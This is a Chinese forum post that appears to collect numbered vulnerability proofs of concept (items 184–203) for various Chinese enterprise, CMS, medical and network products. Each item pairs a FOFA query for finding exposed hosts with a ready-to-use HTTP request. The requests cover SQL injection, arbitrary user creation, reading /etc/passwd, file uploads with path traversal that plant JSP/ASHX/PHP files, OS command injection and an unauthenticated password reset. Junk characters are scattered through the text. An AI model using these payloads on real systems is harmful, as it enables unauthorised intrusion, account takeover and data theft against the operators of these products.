6 z7 j" `% L$ ?/ p4 V8 s( V184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加) r/ L! }; [$ y8 z7 s! D* R
FOFA:server="SunFull-Webs"
; I1 q8 u# u" x" {) WPOST /soap/AddUser HTTP/1.1# N( ^* w  I9 P8 d% Y& ~! B3 R
Host: your-ip
2 ]1 f$ a6 N3 ~Accept-Encoding: gzip, deflate8 e& j( P6 X# n" l$ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$ Q2 K. l6 f. f% _# _5 H9 A0 i
Accept: application/xml, text/xml, */*; q=0.01  k2 }1 ?  l& q8 n5 X" C2 G
Content-Type: text/xml; charset=utf-8: b- A# ^2 K- A/ j" P; V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& P$ i+ W+ \% f+ P1 H1 }3 ]9 V7 S+ Q% yX-Requested-With: XMLHttpRequest/ B, ^: p' O( f( c9 C- B9 s4 j* |

% z2 J3 X" _& F$ L
, v1 Q: ~1 k* Iinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
4 j/ B! x$ Q. G8 v/ |8 I9 i$ q% }4 _; h% h3 o0 s% X8 w0 `; X
' _. @/ C2 b7 I) X. ]
185. 瑞友天翼应用虚拟化系统SQL注入( V8 f. J9 W1 V% R
version < 7.0.5.10 W5 X, n6 ]) \+ i5 w# t- D# J
FOFA:app="REALOR-天翼应用虚拟化系统"
3 E. b3 w+ `# j8 i; P( @" g9 m) HGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
7 v0 a& f% C2 }% Q) K, yHost: host4 F, P6 D, z- `0 |9 J9 A- {2 I" Z
+ P& J! t9 i, v4 x0 _9 n

- G9 L% d- s: P0 O186. F-logic DataCube3 SQL注入
6 L; ~( @9 G: h- `- F; ^* P/ xCVE-2024-317503 ?% C' w  z) U. W+ S
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统5 b0 f+ N6 j# b+ I2 M
FOFA:title=="DataCube3"
4 N7 H! i  m# c5 ]POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
8 z- V! j) g9 N1 IHost: your-ip
* Z1 s' G0 V& e: N( LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
3 l* \7 A: u8 v9 ~# }0 c" jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
: H0 X$ [( Y& F7 ?1 r+ xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 J# T- G2 U# EAccept-Encoding: gzip, deflate* g' l, Q  h9 K% t3 s
Connection: close
( X/ Y- r* a* S" IContent-Type: application/x-www-form-urlencoded9 N+ G- D4 q; D5 q
+ W* l+ ^2 o6 s- h# V; ~7 l8 N
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450& a+ E8 v& r- f5 j

+ v" f1 v4 H( [8 p! X3 c
5 Z. C' i3 Z+ p$ L0 o; U- l187. Mura CMS processAsyncObject SQL注入
, J, i# Z; [8 k2 a% M7 N; Y9 P, XCVE-2024-32640
/ C2 B4 q2 h+ Q6 U9 R, ?FOFA:"Mura CMS"
3 N" l, N6 n, a9 |1 e, X0 ~POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1+ `. C$ U! n8 F) P+ f
Host: your-ip& L. [0 L  a' h6 a. O. b
Content-Type: application/x-www-form-urlencoded
) f/ q( |9 f4 V! ^) N5 {# o& }1 e$ u# J' r2 x& D3 f$ E  O9 S6 @' A3 _

( @9 A  H! G8 `% r  e: c9 {object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1% i* H0 D3 Z0 F! G0 H2 f. U" e

3 Y# K* O3 }2 w) |- w, S( M9 c3 r( z
188. 叁体-佳会视频会议 attachment 任意文件读取
' C% j/ x5 y" ?2 Y& k4 Hversion <= 3.9.7
* y2 z1 a- b* c! e# A& ]FOFA:body="/system/get_rtc_user_defined_info?site_id"0 A/ ~2 J) d# j
GET /attachment?file=/etc/passwd HTTP/1.1
# U; p5 J/ N2 r. N% HHost: your-ip
6 k& M# f& l" y8 L0 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 V' T: y4 F3 M% D3 o+ [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" {- }" D5 z0 ^& L( TAccept-Encoding: gzip, deflate
: ^( a7 d/ P( k! mAccept-Language: zh-CN,zh;q=0.9,en;q=0.8# |. M2 J/ c  M3 `5 V1 y# {
Connection: close
& H6 C$ L3 R7 ]& D3 `/ F* D" T- G
- h) z( G! ~3 N- Z0 D4 U; V4 m3 i5 ]9 d  W6 _8 C9 g
189. 蓝网科技临床浏览系统 deleteStudy SQL注入: Z# z7 x9 U# g5 y1 Q* O
FOFA:app="LANWON-临床浏览系统"4 s! `# ~( V  w
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
; P: a; f5 G! {& F+ NHost: your-ip7 ~- b  W, M% |5 Y7 F8 l
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# W2 Y: ~# S+ c* V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' s, e( c  U( [
Accept-Encoding: gzip, deflate
. q8 ?; A: p) ]Accept-Language: zh-CN,zh;q=0.9
/ M, b/ Y# X/ o) XConnection: close
! u! k! e' ~9 }& q& }3 U" F0 |' }# }
; g8 U1 [' A. p6 K3 _
190. 短视频矩阵营销系统 poihuoqu 任意文件读取5 C$ \8 a2 Y7 g( t, F! q/ w
FOFA:title=="短视频矩阵营销系统"
( _; w! W& N5 {/ z- wPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
" P" K5 m+ q7 N# FHost: your-ip6 h6 r7 T7 }2 y% ~: S- V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
; s1 E% |/ }' A" W/ C% @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' z8 s3 Y9 Z1 D( E1 [Content-Type: application/x-www-form-urlencoded$ N3 S7 w" X& z( d* g7 i. q8 U
Accept-Encoding: gzip, deflate  p& J5 b* D; B3 O: \( h
Accept-Language: zh-CN,zh;q=0.9& c( L$ B7 ?! [. ?- S7 e% s
, B. u! s6 j% T0 \' u% c! R
poi=file:///etc/passwd
  x7 m+ z/ |, k, H1 v9 R/ \; z/ j) S& C
- i/ d( V2 b. ^9 |: s3 f
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入' {* D- x) e4 `0 t. o
FOFA:body="/CDGServer3/index.jsp", x1 T$ w& w9 f+ m
POST /CDGServer3/js/../NavigationAjax HTTP/1.13 B! Z" @. a6 |) @5 v
Host: your-ip  k$ u- y5 e. @" d) d3 @1 }: q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ R7 A( X2 i5 x1 v3 m: G
Content-Type: application/x-www-form-urlencoded
" y* d( ], K0 C9 r& g. V7 \3 V* T1 J( u: Z: P/ U
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
2 X+ y  \& }1 P0 R: w9 P  v' x& Z% w, T5 G

" z& g& Z6 }! \3 b& Z" J2 R192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
7 {7 O* T$ Z' G6 C4 HFOFA:title="用户登录_富通天下外贸ERP"8 H0 Q6 V( Y) U
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1% M, m* r* Q; P0 N8 z& y
Host: your-ip
- g$ x; `6 i" `7 W$ KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
, Q$ d4 {: T  I0 A( D9 m) K. OContent-Type: application/x-www-form-urlencoded
% }5 m4 g- q0 U, k) s3 U
5 f+ C$ }9 ^. K  ?/ a" j4 w) ^" Y+ s
<% @ webhandler language="C#" class="AverageHandler" %>
; Z& [  z4 \/ z+ N2 T3 p# `3 ]1 }& Gusing System;
$ y9 M& H! V' X) f: Gusing System.Web;7 K! \7 W; }3 ^! m) n5 Z2 z6 j
public class AverageHandler : IHttpHandler
6 Z3 I5 {0 A$ {; ~{
% L5 _3 c$ q, y$ x0 K* Z1 cpublic bool IsReusable
5 s5 g  w2 D/ c6 \{ get { return true; } }
" T, D' v+ _2 e. ^9 ]6 G1 n$ mpublic void ProcessRequest(HttpContext ctx)
9 ]- v, g$ i( i* I{5 Z4 E# x' u; O' ?
ctx.Response.Write("test");! p3 R* G! M( ^8 w+ V
}5 F3 R- J' J; V3 N5 ^
}# S' m8 y* B8 D0 s( J) U
' G; i" F8 x) o+ a$ k2 Z, q

% X1 x. ~+ G% I193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
) V, S; k9 }5 F6 Y/ ?* h* ~FOFA:body="山石云鉴主机安全管理系统"
) C; d. @+ z  R8 a: F* SGET /master/ajaxActions/getTokenAction.php HTTP/1.1( t1 l$ W) \5 R5 Y
Host:
" s5 \, I, W# \6 V" }3 [Cookie: PHPSESSID=2333333333333;, `; K2 J  O2 d6 p$ b) D
Content-Type: application/x-www-form-urlencoded1 f2 w2 i# o8 Y. X
User-Agent: Mozilla/5.0
) B) y1 r$ s1 `; G% C8 A; g' g* ^- x, V4 b6 m3 x

( S! ]( b2 A/ K1 `5 VPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
: V' l/ u7 z4 rHost:$ B6 C" [9 \/ ?7 t. _# Y
User-Agent: Mozilla/5.0
2 D2 u& @* F6 o7 m& PAccept-Encoding: gzip, deflate
* x) K7 N7 ]3 u3 i% nAccept: */*" @8 a2 x8 N8 K" u" A
Connection: close
$ ]$ N- |# p: y4 ]2 ECookie: PHPSESSID=2333333333333;& P( `; c  N1 ]" l& H: W% T# M& f
Content-Type: application/x-www-form-urlencoded6 y& Q. Z0 n; y: ~2 T, v  X
Content-Length: 84
  U3 q- @. O  y( q) i- {! s5 V) ]- H9 ?6 R. D+ M& Z
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')5 o( F# @  J  @  s

7 k9 z: P, j" k5 {/ h  z/ h, f- r0 ?3 Z5 w, P0 T. A
GET /master/img/config HTTP/1.16 e0 X5 e3 W5 |. D! l; C. g
Host:" ~4 ]2 r6 _) X
User-Agent: Mozilla/5.0
- T' l8 p3 _! h" ]$ T
! b, f2 s8 \: s1 p; S) J- h7 z2 |  V7 p+ P4 e  i; _
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传% ?, f) ?/ J$ X9 J! ~; u) Z( ]
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
; E! _( v5 [( o- `4 m2 q% c, f/ W
0 d+ F# g: Y! DPOST /servlet/uploadAttachmentServlet HTTP/1.1
, v% n: }6 c+ a5 W' J: y1 C* @Host: host5 F: {6 d% _7 R. C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.360 s) J9 g9 W/ a9 x3 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 _4 q2 }: x# m' x5 f* v( C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 W* F- E0 j- A. T2 VAccept-Encoding: gzip, deflate
" T1 i6 }* [# [- m" x1 lConnection: close
5 F1 `) H- k; }# A. XContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
. U3 _3 T& S) [+ r& b) C------WebKitFormBoundaryKNt0t4vBe8cX9rZk
+ q! Z" Z7 T+ A& @, j
* g) ~) r0 S6 _. ~* \Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"  f! b( J& Y7 p$ G1 Z, p( D* t
Content-Type: text/plain9 `' x5 s3 k1 I
<% out.println("hello");%>
$ w) q9 A* N, i, X" k% k' M! |! C------WebKitFormBoundaryKNt0t4vBe8cX9rZk
. m$ v+ n" _5 e+ x: D, aContent-Disposition: form-data; name="json"
! q: b  `5 y  s& L {"iq":{"query":{"UpdateType":"mail"}}}
9 Z9 j0 G5 C- ?- x------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
% v8 ?* b% s2 o5 c3 M' f: }, S$ c7 a: r0 F- L4 a8 s/ Y
/ R$ t% }$ m' ?+ R4 G
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行4 r) N% u4 M2 r
FOFA:title=="飞鱼星企业级智能上网行为管理系统3 b. k$ ~7 o. N' H6 ~  e
POST /send_order.cgi?parameter=operation HTTP/1.1
/ e+ z! H* r: JHost: 127.0.0.1
/ q; G; ^% g/ O( v. X: A2 }! \Pragma: no-cache
8 |" N+ |; ~( K# {5 X7 yCache-Control: no-cache
& e  Q$ ], n0 Q7 I  j1 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+ o( Y6 O' P% l5 v1 o  o0 IAccept: */*0 n1 W" b4 d& k3 f. P  ?3 d
Accept-Encoding: gzip, deflate" C) E9 S: _3 z: i2 n0 a
Accept-Language: zh-CN,zh;q=0.9
9 c- V$ G+ C; J5 |. X/ MConnection: close
, n" |$ W  H) O9 A; k" Y8 U/ D0 HContent-Type: application/x-www-form-urlencoded! {$ Q" b: R; w2 P/ B3 v6 T5 Z% ]
Content-Length: 68/ z9 W, O% ^2 B* L
$ ^' G- x- Z6 l
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
4 s. {* d1 @! E$ [3 c2 Z
+ R' Y- {8 e: _4 f6 W
; J% N2 k, a1 |, b6 r  X1 J+ I196. 河南省风速科技统一认证平台密码重置5 O8 F# [) a2 W
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"* {% P& U% u/ P  ?
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
+ U  Z* E9 m; I) ]% a0 I9 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ Q* U8 b# T1 rContent-Type: application/json;charset=UTF-8
1 A; z" r9 h: F: _X-Requested-With: XMLHttpRequest1 [( T4 Q) {+ w& `( f
Host:
$ W4 G% e: ~: w! sAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2/ \( K7 V6 X$ O7 ~
Content-Length: 45/ H% F1 N7 _% ^7 q8 `' B* v
Connection: close
! d6 M* |& {6 Q9 \" N
4 Y: ]) B+ X0 Z& ]# X( B{"xgh":"test","newPass":"test666","email":""}7 d2 s2 O. E  K% C

9 O( @# e: C3 X: G
- z/ D" S1 C- ^& F( c8 m9 R. E" u7 d6 G
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
2 W: R2 f) z$ A- j) ]) m- _FOFA:app="浙大恩特客户资源管理系统"
: w. {- z1 `, Q  a! XGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
! Y" p6 H& X* @. M# |Host:
# i9 b% f+ s+ XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
: n( p/ x  W9 H% V+ k3 e3 B- zAccept-Encoding: gzip, deflate
  N6 z: z' O2 n' H9 q8 f/ zConnection: close
  `; h) J7 o3 e) j. ?/ z
7 K) N% D- [, }) R/ j' U4 [9 H6 u0 s" a

" b# S" Q& N9 A9 A) U( T198.  阿里云盘 WebDAV 命令注入
* C6 k0 ]2 g4 ]4 ~CVE-2024-29640
' h& n. V7 n9 q( AGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
, v* H* t- c" GCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
) ^  K' ?0 w8 O" L/ ]Accept: */*" A# V+ Z& v3 f: `; t/ M- f
Accept-Encoding: gzip, deflate
* N& T; r" d5 G5 ]$ |$ ^Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
( b/ I" C# S0 f2 y# ]3 m4 w, ^1 YConnection: close# {$ `$ d/ S) r: n! V" i

8 Y7 U/ i' J; M( [
+ X  I! v# k* B199. cockpit系统assetsmanager_upload接口 文件上传
6 _. [4 I( E" u+ b
9 q# k2 k5 W8 g0 ]4 H( \1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:  e2 I) f" l7 ]: }' ^
GET /auth/login?to=/ HTTP/1.1* g/ e2 h9 c+ ?- M. O" J
& A  C( S1 ~8 F" ?5 U  F
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
2 C, D8 E" s6 a7 e) S" L! n+ a* ~. p8 x, |7 r
2.使用刚才上一步获取到的jwt获取cookie:
, |2 R$ {4 y% z. R+ Q8 j/ g/ h6 @7 N5 b' }, F3 t# p8 _
POST /auth/check HTTP/1.1
# p% f7 w0 g, i  sContent-Type: application/json
2 F/ [; ^" k: n6 ]$ O/ g; N0 n- b# p6 I0 S; s1 U# h* |4 K
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
' n( x2 d% n; d8 ~7 m) i' g% q
; e. Q! @' ?- U7 s响应:200,返回值:# n# \( X1 x0 n. R& l1 c4 Q. M0 F
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/$ @' X8 P0 X. G7 V! V
Fofa:title="Authenticate Please!"
! r- O  O7 o$ Y" E% X- lPOST /assetsmanager/upload HTTP/1.11 `  H2 B; ?& Y. |
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
. I! N+ N" S, ^; I/ sCookie: mysession=95524f01e238bf51bb60d77ede3bea92
  M1 [- _# ?5 i% m1 }  q+ g2 q! _
-----------------------------36D28FBc36bd6feE7Fb3
  c4 Y4 ?3 m0 s& o! o% P, gContent-Disposition: form-data; name="files[]"; filename="tttt.php"
; @9 X; q8 H: E, n  @5 K( l6 Z. qContent-Type: text/php
* F; U+ X. B$ M- V* m6 G
4 n+ u' |1 R2 t4 f<?php echo "tttt";unlink(__FILE__);?>0 _1 }4 `( V% R0 u$ |/ S, k
-----------------------------36D28FBc36bd6feE7Fb3
4 W! }/ j% p5 r; m: MContent-Disposition: form-data; name="folder": c: Y9 o/ F2 H0 X
/ M8 X9 j, G- T0 M/ N" i
-----------------------------36D28FBc36bd6feE7Fb3--9 V9 M% O& F* K4 d& I3 E

8 e5 b( E( [1 e, D  {4 \0 c2 B
, j2 }2 G, M; k" e" U1 R/storage/uploads/tttt.php2 \7 g+ @- ^- }
! ~& ]7 s- q7 h+ }
200. SeaCMS海洋影视管理系统dmku SQL注入0 W2 j2 j. B* G. u( c0 L9 R
FOFA:app="海洋CMS"
6 g. V" J; f5 b" E6 Y7 Y9 A1 dGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
" U7 \$ T6 A- G) {& ]6 U' J4 |2 zCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s4 |$ O2 Z% w; ~7 x% V7 K' R2 C4 Q
Upgrade-Insecure-Requests: 15 u2 b) w3 ^0 M  u. N
Cache-Control: max-age=0
$ k( e' v" E/ ~( I2 C, g* R3 A! QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 ~( F' F$ j5 h5 wAccept-Encoding: gzip, deflate
0 p% J0 v; ?! q/ m- v2 SAccept-Language: zh-CN,zh;q=0.93 {6 O' A/ L& v- @5 M9 N
9 d! S9 G/ M; g
/ ]/ M1 C6 z! k+ ^0 a
201. 方正全媒体新闻采编系统 binary SQL注入% z3 W( r- p" b' Y0 ~
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
! B+ A1 ?9 y3 ^' c# i2 Q/ E# B6 RPOST /newsedit/newsplan/task/binary.do HTTP/1.10 E/ Z) u) C; t5 E8 D' I
Content-Type: application/x-www-form-urlencoded3 l; m0 Y) i' B" n5 \3 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. I: e2 ]7 e2 X4 L" fAccept-Encoding: gzip, deflate3 J0 F! L  Y# ^, ^
Accept-Language: zh-CN,zh;q=0.90 [) q" u; z2 S( s
Connection: close5 y# T0 N1 w+ \  N7 W

+ b+ G8 l( o0 H( JTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
1 _& V' f# W( V* G
3 g" v# n* ^! i0 g8 x$ h) H% e! ~. x
( m3 F3 }, I/ ^$ c6 r202. 微擎系统 AccountEdit任意文件上传5 ^; r5 b: f# D" D8 Y4 f, W
FOFA:body="/Widgets/WidgetCollection/"
. n& |3 K& l# Z; Y" w5 N% `获取__VIEWSTATE和__EVENTVALIDATION值
6 R" i6 e- p0 c8 TGET /User/AccountEdit.aspx HTTP/1.12 o* T8 C2 O+ `$ y
Host: 滑板人之家+ d- M. |) t7 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
* l* `/ k. D; KContent-Length: 0% N, S2 _! p2 Z1 }
3 J2 v+ _! o5 }/ [" W

" L2 x3 b7 `, H0 @6 X; d# t6 |+ |. A替换__VIEWSTATE和__EVENTVALIDATION值
8 a. J, u1 h7 X/ t# `POST /User/AccountEdit.aspx HTTP/1.1
8 I. o& ~( X5 V# p  ]6 G! _Accept-Encoding: gzip, deflate, br' o/ L; R. k' R. p( v' x
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
$ C8 C1 F4 q  i" \- B  T+ l$ u+ a4 [. _/ ?: N3 @" ~8 m+ W6 {
-----------------------------786435874t38587593865736587346567358735687
: o0 f& S# N2 N* q" mContent-Disposition: form-data; name="__VIEWSTATE"' ]" ?1 K- R/ T7 f( ~

& q, J9 R* T2 N4 K4 x% k__VIEWSTATE" n" s1 |# e' v4 [0 g( a
-----------------------------786435874t38587593865736587346567358735687
6 I) L0 A  q9 UContent-Disposition: form-data; name="__EVENTVALIDATION"+ S3 B8 y' E( ~7 k, s

9 n' m4 \; E; }  B__EVENTVALIDATION
4 W% B* K; {4 Q( b-----------------------------786435874t38587593865736587346567358735687
2 i9 j- E; u2 K' X: MContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"% Q4 n/ y# x1 b: F; P1 l" m8 m
Content-Type: text/plain* U9 `2 W4 _- ?3 w+ P' Z2 A9 U" x9 h

; D% ^; d% K- q& GHello World!9 f' e  x& E# D; l7 ]0 m$ B1 y! Q
-----------------------------786435874t38587593865736587346567358735687
$ S- T- b( j( L3 v7 dContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
# r" ?; x' _, ~" M+ m1 |
" o5 J+ D3 ^. J; |6 `! R上传图片
7 o$ f! b# I' p% \-----------------------------786435874t38587593865736587346567358735687( D* c6 O7 d( Q. Q- n
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
2 k8 g. e& T: n$ X( A- A
: z/ T3 G- g  h
) f: P* r2 k0 t2 X-----------------------------786435874t385875938657365873465673587356870 ^/ s+ {8 }9 w! g# I" f8 y7 \8 e
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
7 ?1 S! j( A3 ?7 e& v
( |- C2 C5 T2 q' `
8 }+ P: y7 |' ~) z. M-----------------------------786435874t38587593865736587346567358735687--+ Z) ^4 c3 M0 b3 L3 M
* I/ X  z( q' q. G1 F
5 ^8 i' ^, n. w
/_data/Uploads/1123.txt
- l4 r+ s& P9 d3 J# J
4 T* w$ z6 k0 _( a( |7 u( a203. 红海云EHR PtFjk 文件上传( Y+ S. [3 D- ?' Y% {7 ?- m$ `$ V
FOFA:body="RedseaPlatform"' [0 @2 X# O; a% a
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1* p: c0 r; s5 g. d& n% \; q7 d$ Y
Host: x.x.x.x
6 r" ?& ^" R) c# HAccept-Encoding: gzip
- j3 E' Z4 M4 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 a; E9 k9 ?' f, H) Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4" a6 X- c$ [7 I3 l  L- C
Content-Length: 210! U' n$ G4 C" b5 w6 j9 b, D

: a  G$ Z1 L) ?------WebKitFormBoundaryt7WbDl1tXogoZys4( h( \" `, C# Z) X9 w+ J) K
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
' L* a5 L. S9 p4 JContent-Type:image/jpeg2 m' c8 a: ~# B" O. ]
  `. R. R$ t8 [( J6 e
<% out.print("hello,eHR");%>' f8 p7 `5 U9 [( [
------WebKitFormBoundaryt7WbDl1tXogoZys4--3 e! o$ [1 S1 W; K

) o; R! r. u" s% z
% d$ d6 a* Z; Y% |) e, d- j3 u' j/ M% V. _

4 d" n2 q) P1 T" q  f/ ~$ ?" F; W
/ K. a* u8 I" K, j7 s% E, O. V
) R3 }9 K% F8 x$ P* J6 U( ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表